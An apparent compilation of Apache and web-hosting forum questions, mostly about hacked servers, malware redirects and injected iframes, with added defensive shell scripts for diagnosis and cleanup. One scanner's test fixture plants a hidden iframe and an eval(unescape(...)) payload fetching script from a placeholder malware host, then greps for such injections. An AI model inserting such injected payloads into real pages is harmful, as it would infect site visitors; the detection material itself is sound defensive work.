All HTTP Requests To My Server Get Redirected To Malware Websites
Jul 24, 2009
When I try to open any website hosted on my server (around 50 of them), I am taken to the following malware websites:
[url]
[url]
This is a problem with my Linux server running Apache and not a virus on my local computer, as customers from all over are reporting the same issue.
As soon as I restart Apache, everything returns to normal with no such redirects.
I think my server is being attacked, causing HTTP requests to get redirected to some malicious website.
This issue would resurface almost every hour and would not go away till I restart Apache.
So far my datacenter techs have not been able to identify the cause of this.
There seems to be some problem with my server: none of the websites hosted on my server are accessible; the HTTP requests either return a blank page or a page with a red square in the upper left-hand corner.
I am not sure if this is some kind of infection, or a DNS problem, or a problem with the memory Apache is taking up, as I have thousands of VirtualHost entries in my access log accumulated over the years, out of which only a few hundred websites I am serving presently, but I never deleted the non-existent VirtualHost blocks.
At times the websites are opening, but most of the time they are not. And when they do not open, my HTTP requests are not logged in the Apache access log.
Even the customers have reported the same problem.
Also, just four days back I had a strange issue where all HTTP requests to my server would take me to [url].
I can SSH to server, and everything else is working fine.
My Linux server's HTTP daemon (Apache) would stop serving websites ever so often; as soon as Apache is restarted the error fixes itself, only to resurface within a few hours.
The Apache process would still be running, i.e. Apache does not die, but no websites hosted on my server would be accessible from a browser. And when this happens the Apache logs do not log any HTTP requests.
Instead, when this happens all HTTP requests to my server would be redirected to some weird Trojan website and my Norton Antivirus would show an alert/warning, for example: "Browser exploit at www.xxx.xxx was blocked" Risk Name: MSIE WebViewFolderIcon ActiveX Control BO
or another error like: "Auto-Protect has detected Trojan.Fakeavalert".
At first I thought the problem could be with my laptop/ISP, so I logged on to the server via SSH and tried to open a website using the command line "lynx mywebsite.com", and it shows the following error: "Alert!: HTTP/1.0 503 Service Unavailable".
Now if I assume my laptop were infected, then as soon as I restart my Apache and visit mywebsite.com everything returns to normal with no such warnings. Why do I see those Norton error messages only when Apache is down with 503, and when Apache is down with 503 how come the HTTP requests always get redirected to some suspicious websites and nothing gets logged in the Apache error log?
I think my server is being attacked, causing HTTP to become unresponsive, and thereafter HTTP requests to my server are redirected to some malicious website; is this correct?
Also, I suspect this is a PHP script exploit, as some customers have reported that Google has blocked their website for security reasons; I found <iframe> tags inserted in some PHP pages, which I fixed.
Also, another thing I noticed: when Apache responds with the 503 it is referencing PHP 5.1.4 in the response header:
[root@]# curl -I xxx.xxx.xxx.xxx (my server ip)
HTTP/1.0 503 Service Unavailable
Server: Apache
X-Powered-By: PHP/5.1.4
Retry-After: 20
I am running PHP 4.3.9, so why does Apache respond with PHP 5.1.4 when this 503 error surfaces?
Also, since my Apache was down with the 503 error, a customer mailed in today saying: "It seems that my site www.xxxx.com is regularly down, and the winlogon virus is involved."
I suspect this is again due to the fact that HTTP requests start getting redirected?
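One check worth running on the symptom described above, as an added example rather than anything from the original post: whatever answered the 503 identifies itself as PHP/5.1.4 on a host that runs PHP 4.3.9, and lynx on the server itself saw the same 503, so the thing answering port 80 should be fingerprinted and compared with the httpd that was configured. The script below pulls a single header out of a `curl -I`-style response and compares X-Powered-By with the expected version. Both response samples are constructed for the example; the two PHP versions are the ones quoted in the post.

```sh
#!/bin/sh
# Added example (not from the original post): compare the fingerprint of
# whatever answered on port 80 with the PHP version this host actually runs.
# Both response samples below are constructed for the example.

# Print the value of header $1 (case-insensitive) from a header block on stdin.
header_value() {
    awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        { line = $0; sub(/\r$/, "", line) }
        index(line, ":") {
            name = tolower(substr(line, 1, index(line, ":") - 1))
            if (name == want) {
                val = substr(line, index(line, ":") + 1)
                sub(/^[ \t]+/, "", val)
                print val
                exit
            }
        }'
}

# Read a response header block on stdin; return 0 if X-Powered-By matches $1,
# 1 if it names a different version, 2 if the header is absent entirely.
check_powered_by() {
    got=$(header_value X-Powered-By)
    [ -n "$got" ] || return 2
    [ "$got" = "$1" ] && return 0
    echo "mismatch: responder says '$got', this host runs '$1'" >&2
    return 1
}

# Constructed sample: the 503 seen during an outage (headers as in the post).
SAMPLE_503='HTTP/1.0 503 Service Unavailable
Server: Apache
X-Powered-By: PHP/5.1.4
Retry-After: 20'

# Constructed sample: a healthy answer from the real httpd on this host.
SAMPLE_OK='HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.3.9
Content-Type: text/html'

# Stand-alone demo. In practice feed "curl -sI http://127.0.0.1/" run on the
# server itself, and "curl -sI http://<public-ip>/" run from outside, and
# compare the two: a mismatch between them points at the network path, a
# mismatch on localhost points at the box.
printf '%s\n' "$SAMPLE_OK"  | check_powered_by PHP/4.3.9 && echo "healthy: fingerprint matches"
printf '%s\n' "$SAMPLE_503" | check_powered_by PHP/4.3.9 || echo "rc=$?: not the httpd you configured"
```

When the localhost fingerprint is already wrong, the next things to look at are which process owns the listening socket (`netstat -tlnp` or `ss -ltnp`), whether a NAT rule is diverting port 80 (`iptables -t nat -L -n`), and whether /etc/hosts or the resolver has been altered; a 503 with a Retry-After that appears only while the real httpd is wedged is consistent with a second listener or a proxy taking over the port.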
I set up a cron to run every minute, and I'm running a PHP script by way of cron like
wget http://example.com/some_script.php
Now, is each cron run a separate HTTP request, or what? Say my script takes more than 1 minute to execute completely, but before it's completed, it's called again. So, will that affect the PHP script running because of the previous HTTP request, or will it create a new HTTP request and let the previous request finish its operation? Technically, it shouldn't block/affect the previous request, but I'm not sure!!
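Each cron run starts a fresh wget, so it is a separate HTTP request that Apache serves in parallel with the one still running; PHP will not wait for the earlier run unless the script itself takes a lock. If overlapping runs are unwanted, the simplest place to serialize them is the cron side. The wrapper below is an added example, not code from the original post: it takes a lock with mkdir, which either creates the directory or fails atomically on every POSIX system (`flock -n` from util-linux does the same job where it is installed), and skips the run when the lock is already held. The lock path and the wget command line are assumptions.

```sh
#!/bin/sh
# Added example (not from the original post): run a cron command only when no
# previous instance is still running, using a lock directory.
# Lock path and the wget target are assumptions for the example.

# run_exclusive LOCKDIR CMD [ARGS...]
# mkdir either creates the directory or fails, atomically, so two instances
# can never both believe they own the lock. Returns 75 (EX_TEMPFAIL) when the
# lock is held; otherwise CMD's own exit status, with the lock released after.
run_exclusive() {
    lockdir=$1
    shift
    if ! mkdir "$lockdir" 2>/dev/null; then
        echo "run_exclusive: $lockdir is held; skipping this run" >&2
        return 75
    fi
    "$@"
    rc=$?
    rmdir "$lockdir"
    return "$rc"
}

# If saved as /usr/local/bin/run_exclusive.sh (assumed path), the crontab
# entry becomes:
#   * * * * * /usr/local/bin/run_exclusive.sh /var/lock/some_script.lock \
#       wget -q -O /dev/null http://example.com/some_script.php
if [ $# -gt 0 ]; then
    run_exclusive "$@"
fi
```

A process killed by a signal or a reboot leaves the directory behind and every later run is skipped until it is removed by hand, which is the usual argument for flock: its lock vanishes with the process. Putting the lock under /var/lock, which most distributions clear at boot, covers the reboot case.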
I have a guy who can't get to any of the 100 or so virtual hosts on my RHEL3 server.
It's running the latest Apache RPM from RedHat. I also have mod_evasive and mod_security running.
Here's what I know. The guy *CAN* connect via SSH and FTP. The guy *CAN* see the default web page when he hits the IP in his web browser (e.g. he types [url] into the address bar in IE). But when he uses any of the host names on the server he *CAN NOT* see anything. He gets timeout errors.
His IP is NOT in ANY error logs; it's not in mod_evasive or mod_security, it's not in IPTABLES, it's not anywhere I can see.
I must be missing something. Anyone have any ideas?
What would be in front of Apache blocking his requests?
I have a situation where if domain2 or domain3 is offline, people visiting them will get redirected to domain1 (since domain1 is the top of the hierarchy in the virtualhost). If I type in the IP address 11.22.333.44, I get redirected to domain1. I don't want this to happen. I rather have it show an error page or something instead. Am I missing anything? Here's the sample from my httpd.conf file:
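Apache sends every request whose Host header matches nothing, including requests for the bare IP and for sites that are currently disabled, to the first VirtualHost defined for that address and port, which is why domain1 receives them. The usual fix is to put a dead-end default block in front of the real sites. The config and the small checker below are an added example, not the poster's httpd.conf (which is not shown): the hostname default.invalid, the empty DocumentRoot and the two-site sample config are assumptions.

```sh
#!/bin/sh
# Added example (not from the original post): a catch-all first VirtualHost
# that answers unmatched Host headers with 404, plus a checker that reports
# which ServerName currently sits first in a config. Hostnames and paths are
# assumptions for the example.

# The block to place BEFORE every real site on the same address:port.
# "Redirect 404 /" makes every path on it return 404 without touching disk.
# (Apache 2.2 syntax; on 2.4 replace the Order/Deny lines with "Require all denied".)
default_vhost_conf() {
    cat <<'EOF'
<VirtualHost *:80>
    ServerName default.invalid
    DocumentRoot /var/www/empty
    Redirect 404 /
    <Directory /var/www/empty>
        Order deny,allow
        Deny from all
    </Directory>
</VirtualHost>
EOF
}

# Print the ServerName of the first <VirtualHost> block in the config on stdin:
# that is the block that answers the bare IP and any unknown Host header.
first_vhost_servername() {
    awk '
        /^[ \t]*<VirtualHost/                 { inblock = 1; next }
        inblock && /^[ \t]*ServerName[ \t]/   { print $2; exit }
        inblock && /^[ \t]*<\/VirtualHost>/   { print "(no ServerName)"; exit }
    '
}

# Constructed sample of the situation in the post: domain1 is listed first.
SAMPLE_CONF='NameVirtualHost *:80
<VirtualHost *:80>
    ServerName domain1.example
    DocumentRoot /var/www/domain1
</VirtualHost>
<VirtualHost *:80>
    ServerName domain2.example
    DocumentRoot /var/www/domain2
</VirtualHost>'

# Stand-alone demo: which site catches stray requests, before and after
# prepending the dead-end block.
printf '%s\n' "$SAMPLE_CONF" | first_vhost_servername
{ default_vhost_conf; printf '%s\n' "$SAMPLE_CONF"; } | first_vhost_servername
```

Run the checker against the live file with `first_vhost_servername < /etc/httpd/conf/httpd.conf` (or whichever file holds the vhosts); if it prints a customer's domain, that customer is also receiving every bot request aimed at the raw address.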
my server is still effed up from the MPack attack that I received.
I just received the following email; does anyone know what this means or how it could be done? The client IP is mine, so somehow my server is sending that request?
I was able to successfully delete all the files, but how do I now get rid of the directories themselves? When I do: rm -fr "/arcade/images/. /" and then locate ". " I still get:
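Directories named with dots and spaces (". ", ".. ") are a favourite hiding place after a compromise because they look like the normal "." and ".." entries in ls output and are awkward to type, as the rm above shows. The script below is an added example, not from the original post: it finds every directory whose name is only dots and whitespace, shows them with the trailing padding made visible, and removes them. It is exercised here on a throwaway tree that reuses the post's /arcade/images path; the rest of the tree is constructed.

```sh
#!/bin/sh
# Added example (not from the original post): locate and remove directories
# whose names are only dots and whitespace. The sample tree is constructed.

# Print, one per line, every directory below $1 whose name consists solely of
# dots and whitespace. find never lists the real "." and ".." entries, and
# the starting directory itself is skipped explicitly.
find_odd_dirs() {
    find "$1" -type d -name '.*' | while IFS= read -r d; do
        [ "$d" != "$1" ] || continue
        case "${d##*/}" in
            *[!.[:space:]]*) ;;            # contains a normal character: skip
            *) printf '%s\n' "$d" ;;
        esac
    done
}

# Same list with trailing spaces and tabs made visible: sed's "l" command
# escapes non-printables and marks the end of each line with "$".
show_odd_dirs() {
    find_odd_dirs "$1" | sed -n 'l'
}

# Remove them. "--" stops rm from reading a name that starts with "-" as an
# option, and the quotes keep the trailing space as part of the name.
remove_odd_dirs() {
    find_odd_dirs "$1" | while IFS= read -r d; do
        rm -rf -- "$d"
    done
}

# Stand-alone demo on a constructed tree (remove the rm at the end to inspect).
demo=$(mktemp -d)
mkdir -p "$demo/arcade/images/. /payload" "$demo/arcade/images/.. " "$demo/arcade/images/.thumbs"
: > "$demo/arcade/images/. /payload/x.php"
show_odd_dirs "$demo"
remove_odd_dirs "$demo"
rm -rf "$demo"
```

Names containing a newline would split the line-oriented loop; for those, `find /arcade/images -type d -name '.*' -print0 | xargs -0 ls -ld` shows them intact, and `ls -la | cat -A` is the quick way to see padding in a listing. A directory that will not go away even then is worth checking with `lsattr` for the immutable bit.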
I've spent the last several months working on a huge upgrade of a couple dozen websites. The upgrades include modifying Apache so that visitors who arrive at links pointing to mysite/World/New_York are redirected to mysite/world/new-york. In other words, all my links now default to lower case, and underscores are replaced with dashes.
Unfortunately, publishing it has been an endless series of disasters. My websites are now all crashed, and the server is unbelievably slow. It takes pages forever to load (if they load at all), and I can scarcely publish files online. So the following notice sent to me by my webhost got my attention.
It appears your own server IP is making GET requests to Apache, causing excessive loading and causing service failures. On today's date, your IP made almost 6,000 connections to Apache:
I am using mod_auth_form. For security reasons, I would like to ensure that users are ALWAYS redirected to the page specified in the AuthFormLoginSuccess location after a successful login. Therefore, I would like to disable processing of the httpd_location form parameter.
The best I can do seems to be to use AuthFormLocation to set the field name to a hard-to-guess value, e.g. AuthFormLocation "32 b63 a#ve"
I host my DNS with DNSmadeeasy.com. I noticed that I have daily more than 350.000 DNS requests for the main domain. This domain gets about 80.000 uniques/day, so it is strange how there can be 350.000 DNS requests/day. It seems that I'll go over the quota because of this.
The TTL for all domains is set to 86400.
Is there a way to discover how this is possible? And also, is there a way to do something to make this number of DNS requests lower?
Where is a server's IP address for outgoing requests set? e.g. if a script on the server fetches ip-address.com, the IP that is identified there. A server may have multiple IPs pointing to it, but there's only one that outgoing requests are funneled through. I've tried changing "Main Shared IP" in WHM, but that doesn't seem to affect this.
Is this set server-side, in some setting file - or is this a datacenter thing?
Can this be interpreted as malware (proceed with the following steps with caution)?
After visiting miniclip.com/games/super-gerball/en/, without me clicking on anything or confirming that I want to install a game, a new folder is created in my Windows Start Menu and in a Documents and Settings folder.
Although I believe no harm is actually done with this installation, can an attacker use this method to install malware? How can I prevent this; what options should I change in my Firefox browser?
I currently have a web VPS hosted with FDCServers.net, and after 5 days of switching to it I am getting massive HTTP requests. When I log in to WHM and hit Apache status I have many requests per second from multiple IPs that are going to pages that simply don't exist. Currently my hostname for the server is set to web-01.optical-hosting.com, which is what the requests are being sent to. I am also having a DNS issue, because when I put http://web-01.optical-hosting.com in the web browser it displays the first account's site under "list accounts" in cPanel. Can someone please help me fix both of these issues? I will post an Apache log in a second post as it is long. Also, these are from overseas. Please, someone help me with this; I have AIM and MSN.
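This post and the earlier one whose host counted almost 6,000 connections from the server's own IP describe two halves of the same triage: who is the busiest client in the access log, and what are they asking for. Both fall out of a few awk passes over the combined log format. The script below is an added example, not from either post: the log lines, the server address 203.0.113.10 and the scanner address 198.51.100.7 are constructed, and the thresholds are arbitrary defaults.

```sh
#!/bin/sh
# Added example (not from the original posts): summarize an Apache combined
# access log to spot the server requesting itself and remote clients probing
# for paths that do not exist. Every log line below is constructed.

SAMPLE_LOG='203.0.113.10 - - [21/Jul/2009:10:00:01 +0000] "GET /wp-cron.php HTTP/1.0" 200 512 "-" "WordPress/2.8"
203.0.113.10 - - [21/Jul/2009:10:00:02 +0000] "GET /wp-cron.php HTTP/1.0" 200 512 "-" "WordPress/2.8"
203.0.113.10 - - [21/Jul/2009:10:00:03 +0000] "GET /wp-cron.php HTTP/1.0" 200 512 "-" "WordPress/2.8"
203.0.113.10 - - [21/Jul/2009:10:00:03 +0000] "GET /index.php HTTP/1.0" 200 9001 "-" "Wget/1.11"
198.51.100.7 - - [21/Jul/2009:10:00:04 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 296 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Jul/2009:10:00:04 +0000] "GET /admin/ HTTP/1.1" 404 296 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Jul/2009:10:00:05 +0000] "GET /mysql/ HTTP/1.1" 404 296 "-" "Mozilla/4.0"
192.0.2.44 - - [21/Jul/2009:10:00:06 +0000] "GET /about.html HTTP/1.1" 200 2310 "http://example.com/" "Mozilla/5.0"'

# Combined log fields: $1 client, $7 request path, $9 status code.

# Requests per client address, busiest first: "count ip".
top_clients() {
    awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Clients with at least $2 requests of which at least $1 percent were 404:
# "ip total 404s". Probing for /phpmyadmin/, /admin/ and friends looks like this.
scanners() {
    awk -v minpct="$1" -v minreq="$2" '
        { total[$1]++; if ($9 == 404) nf[$1]++ }
        END {
            for (ip in total)
                if (total[ip] >= minreq && 100 * nf[ip] / total[ip] >= minpct)
                    print ip, total[ip], nf[ip]
        }' | sort
}

# What the server asked itself for: "count path" for client address $1.
# The user agent on those lines usually names the culprit (a cron wget, a
# plugin's pseudo-cron, a script fetching its own URLs).
self_requests() {
    awk -v me="$1" '$1 == me { p[$7]++ } END { for (u in p) print p[u], u }' | sort -rn
}

# Stand-alone demo; on a real box replace the printf with
#   cat /var/log/httpd/access_log
printf '%s\n' "$SAMPLE_LOG" | top_clients | head -5
printf '%s\n' "$SAMPLE_LOG" | scanners 80 3
printf '%s\n' "$SAMPLE_LOG" | self_requests 203.0.113.10
```

A server that shows up as its own top client is either running something that fetches its own pages (compare with `crontab -l` for every user and with the user agents in the log) or has been turned into a scanner of other hosts, which is what the abuse e-mail quoted in an earlier post points at; the self_requests output distinguishes the two by what is being requested. Addresses that the scanners function flags are candidates for mod_evasive or a firewall rule rather than for tuning Apache.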
Recently, I hosted my domain with two different servers, but both of them were attacked by malware and viruses. Google also started showing a warning like "This site may harm your computer".
Now I can't open my site in Firefox (it gives a security warning)... when I open it in Explorer, my index page is totally changed.
Is there a solution for that? Which linux server will be best to protect my site from malware attacks.
A website I've recently been entrusted with was cracked into via brute-force FTP earlier this week. Apparently the bad guys ran a script that added iframe links to every page named index.html. The iframe linked to 3 sites that prompted malware downloads.
I think I've found and removed all the affected code, however I'm looking for an online website scanner that will drill down through all the links on a given site and search the code for similar problems.
I've only found a couple of these so far and they don't seem to fit the bill; was wondering if anyone here had recommendations or experience with similar tools...
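This post and the earlier one that found <iframe> tags inserted into PHP pages face the same cleanup problem: finding every file that still carries the injected markup. An online scanner only follows links, so a file nothing links to (a footer include, a forgotten copy of index.html) is missed; a grep over the document root is not. The script below is an added example, not from either post: it builds a constructed tree with one clean page and two injected files, then scans it. The hostname malware.example and all sample content are made up, and the patterns cover the common shapes only (off-site iframe, zero-sized iframe, self-unpacking script).

```sh
#!/bin/sh
# Added example (not from the original posts): scan a web root for injected
# iframes and self-decoding script blocks. The sample tree is constructed.

# Build a small tree: one clean page with a local iframe (must not be
# flagged), one index.html with a hidden off-site iframe, one PHP file with an
# eval(unescape(...)) payload appended.
make_sample_tree() {
    mkdir -p "$1/clean" "$1/infected"
    cat > "$1/clean/index.html" <<'EOF'
<html><body><h1>Hello</h1><iframe src="/local/widget.html"></iframe></body></html>
EOF
    cat > "$1/infected/index.html" <<'EOF'
<html><body><h1>Hello</h1>
<iframe src="http://malware.example/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>
EOF
    cat > "$1/infected/footer.php" <<'EOF'
<?php echo "ok"; ?>
<script>eval(unescape('%3Cscript%20src%3D%22http%3A//malware.example/x.js%22%3E%3C/script%3E'))</script>
EOF
}

# Print "file:line" for every suspicious hit under $1. /dev/null is passed to
# grep so the file name is always prefixed even when only one file matches.
scan_webroot() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' -o -name '*.php' -o -name '*.js' \) -print0 |
        xargs -0 grep -nEi \
            -e '<iframe[^>]*src=["'"'"']?https?://' \
            -e '<iframe[^>]*(width|height)=["'"'"']?0' \
            -e 'eval\(unescape\(' \
            -e 'document\.write\(unescape\(' \
            /dev/null | cut -d: -f1,2
}

# Stand-alone demo.
demo=$(mktemp -d)
make_sample_tree "$demo"
scan_webroot "$demo"
rm -rf "$demo"
```

Point scan_webroot at the real document root (`scan_webroot /var/www`) and review each hit by hand: a legitimate page can embed an off-site iframe, so the list is a worklist, not a verdict. Two companions narrow it further: `find /var/www -type f -newer /some/known-good-file` lists everything written since a date you trust, and because the entry point here was FTP, every FTP password on the account is burnt regardless of how clean the scan comes back.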
I'm running Apache 2.4.4 on Windows Server 2008 R2. It's already happened many times that Apache stopped responding to requests. The last entry in the error.log:
[Wed Mar 27 06:22:07.043600 2013] [mpm_winnt:notice] [pid 1736:tid 256] AH00354: Child: Starting 64 worker threads.
[Wed Mar 27 06:52:34.521200 2013] [mpm_winnt:error] [pid 1736:tid 1656] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
Yesterday I installed Tomcat on a RHEL 4 + cPanel and httpd 2.0.63 server using easyapache3. The process was OK, and JSP pages are loading fine using http://site.com/example.jsp, but servlets are not working using http://site.com/example; however, if I load http://site.com:8080/example it loads the servlet perfectly.
I read something about redirecting all traffic from port 80 to 8080, but you know... this is a shared server, and that would affect all customers on the server.
So, mod_jk seems to be the only solution, now I read many documents over the web, but no one seems to be working to configure apache2 and mod_jk that is installed using easyapache3 script.
In my httpd.conf file, i have this:
LoadModule jk_module modules/mod_jk.so
Include "/usr/local/apache/conf/jk.conf"
In jk.conf I have this content: ...
A WordPress install on one of my domains was compromised a few months ago, and there was a 4-hour window in which the site contained an iframe injection that led to a malware site.
The problem was corrected, and Google stopped flagging the site as malicious within a few hours after the fix. However, every once in a while I still hear of people having problems accessing the site, all of them I think from within large corporate networks.
Are there a few common list providers that these corporate networks are likely to be subscribing to? Is there a way I can submit the domain for reevaluation? If not, how long would you think a domain would have to be clean in order to repair its reputation on these lists?
I currently have a reseller server in the States, but I've seen that for the money I'm paying (and I'm not actually using the space) I can get a VPS here in the UK which I can combine for web hosting and other development projects. I am after a UK-based VPS for the following requirements:
Host 15 websites
Access the box remotely and dial in to the box, which needs to be configured as a VPN server (the box will act as a router; I presume masquerading on eth0 for the connected VPN clients to go out through the server and onto the net).
Traffic will not be too high, maybe around 75GB per month.
Around 3-4 websites run forums on (small size phpbb) and the other sites are again small and mostly used for email.
I will need full root access and maximum configurability.
Preferably SUSE 10 as I have worked with that before, but I am open to suggestions on other OSes. I need to configure the pppd service, and the easier this is via the OS the less time I have to dig in scripts and the terminal! I wouldn't mind Windows, but on a VPS this will be a resource drain, so I am happy to get more performance from the box by sticking with the smaller footprint of Linux.
Plesk for website management, or cPanel; I don't mind either way.
I don't, however, know how much CPU/RAM I will need; what is a sensible amount? I don't think my requirements are too strenuous. What would be a good sensible amount of RAM to select to allow me to host, say, 50 websites in future?
I have heard good things on the forums for the following:
a2b2.com cheapvps.co.uk 1and1.co.uk
I know you get what you pay for, so I do need something reliable, but if people say the service from the above sellers is good I will go for them, as the price is fantastic. It would be great to hear of other recommendations also.
I have a Windows Server 2003 package installed on a server. I own a number of websites that are being hosted some place else. How do I get my websites set-up to run on my new server?
I have a client with a site (wordpress blog) that gets 10,000 + hits a day. I need to find him a dedicated managed server so that his site runs smoothly and also has no outages. I just received a quote from another host for his Managed Dedicated Servers.
CPU1: Intel Xeon 5310 Clovertown (Quad Core)
CPU2: Intel Xeon 5310 Clovertown (Quad Core)
Total CPU Cores: Eight (8)
System RAM: 6144MB (6GB) DDR2 ECC Registered System RAM
Primary Hard Disk: 73GB Serial Attached SCSI (SAS) 15,000 RPM High-Performance Hard Disk
Second Hard Disk: 250GB SATA-II 7,200 RPM Hard Disk (nightly backup disk)
Data Transfer: 2000GB Premium Monthly Bandwidth (100Mbps uplinked port)
Operating System: CentOS Enterprise Linux 5 64-Bit (x86_64)
Control Panel License: cPanel / WHM + Fantastico Auto Installer
$695 a month
He posts about 5-10 blogs a day too, so it's definitely a growing community website. He also has a forum with 6500 posts and 389 members.
Is this a reasonable price for a dedicated server? Would you recommend a different configuration of hardware that might make it cheaper? I would also like some examples of other sites on similar configurations if you have any, so that I can show my client what they use.
A lot of people start off with a dedicated server when they first start their website because they feel they will eventually need it anyway. They also don't want to go through the trouble of transferring their website in the future. Do you think it's wise for a new website to do this or do you feel they should start off with shared hosting and then transfer their website after it already has a lot of traffic?